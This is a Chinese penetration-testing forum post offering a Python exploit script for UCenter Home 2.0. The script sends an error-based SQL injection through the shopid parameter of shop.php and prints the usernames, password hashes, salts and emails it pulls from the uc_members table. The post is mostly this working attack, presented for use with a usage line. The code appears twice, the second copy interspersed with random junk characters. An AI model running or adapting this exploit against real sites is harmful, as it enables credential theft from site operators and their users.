找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1953|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl; x" r: G8 ^: `7 [3 j3 ~+ P; r' ~7 F

- m% c. a6 t" c) h
; S' u* n6 E4 ~8 l2 U#!/usr/bin/env python  
9 l2 }& {" c+ w- k1 r7 {
3 ?1 V* P% [: |. Q( W1 Pimport sys  
0 W8 v0 |$ P' timport urllib2  
$ @6 Y) K# `" @6 e1 O3 ?! Uimport re  
. s# {7 H" C) ` ! f& V% q8 T2 ^  z
def info():  9 c' a4 x0 v" m" [+ P1 F
    print 'From:http://www.exploit-db.com/exploits/14997/'
4 _8 n5 E* }2 J' O/ a* C    print 'http://www.hake.cc/Web_loudong/' 1 y' K: t/ Y8 m1 T& ~* e
    print 'changed:qiaoy'  
1 {4 ^: U& L6 r+ e& q7 P- N    print 'exp:'  0 p6 ]! G( J+ a
    print ' ./UCenter_Home_2.0.py site'  
) K$ u! i& g. \$ L - a* P9 n4 e6 I. L" L% [3 y
def main():  
3 ~4 m, l% ^, P    if len(sys.argv) != 2:  7 K( _, u# N$ Y$ `' C% Q2 p9 X
        info()  
$ f2 @, P( |/ q( k: ]    else:  + J9 o8 B6 _7 a' B6 F3 V
        site = sys.argv[1]  5 H! ?4 i, ]/ r1 V3 ^9 s
        if site[0:7] == 'http://':  7 ^4 E. @5 w4 g  F
            sitesite =site  
& Q9 p9 p) }% ~* g7 k8 w        elif site[0:8] == 'https://':  
; ~$ d7 d. p4 F0 F            sitesite = site  
/ z8 r3 |: ~) t% i& r        else:  1 ^; L! |- F1 I! k# {
            site = 'http://'+site  6 @4 d; y: g% M* J: n$ N+ D
        try:  
/ h( H& m' ?$ L            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  ( ~4 B6 h' h7 I5 q
            Value = urllib2.urlopen(url).read()  
* P) |% f! J% f- n            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  1 L+ n7 o. V/ ~' T) x; N1 E
            hacked = Msg.split(':')  : ?5 i6 q) }! k6 r7 |: }5 \6 w/ M, c
            print 'Name:    '+hacked[1]  * D- b+ C1 t. Z5 d# z" t1 l3 Q
            print 'Passwd:  '+hacked[2]  
4 E3 B' {; L! G( ?2 L/ i            print 'salt:    '+hacked[3]  
2 w6 @- w) G! f! x            print 'email:   '+hacked[4]  
5 Q5 c$ P6 [1 Q* ?- _: m        except:  
2 S. Z) K( {/ i            print 'Sorry,I can\'t work............'  2 X6 U6 s" J1 z" |+ s
% t3 ~2 B) }9 l0 z) Z
if __name__ == '__main__':  + f) t2 d% \) k7 q
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表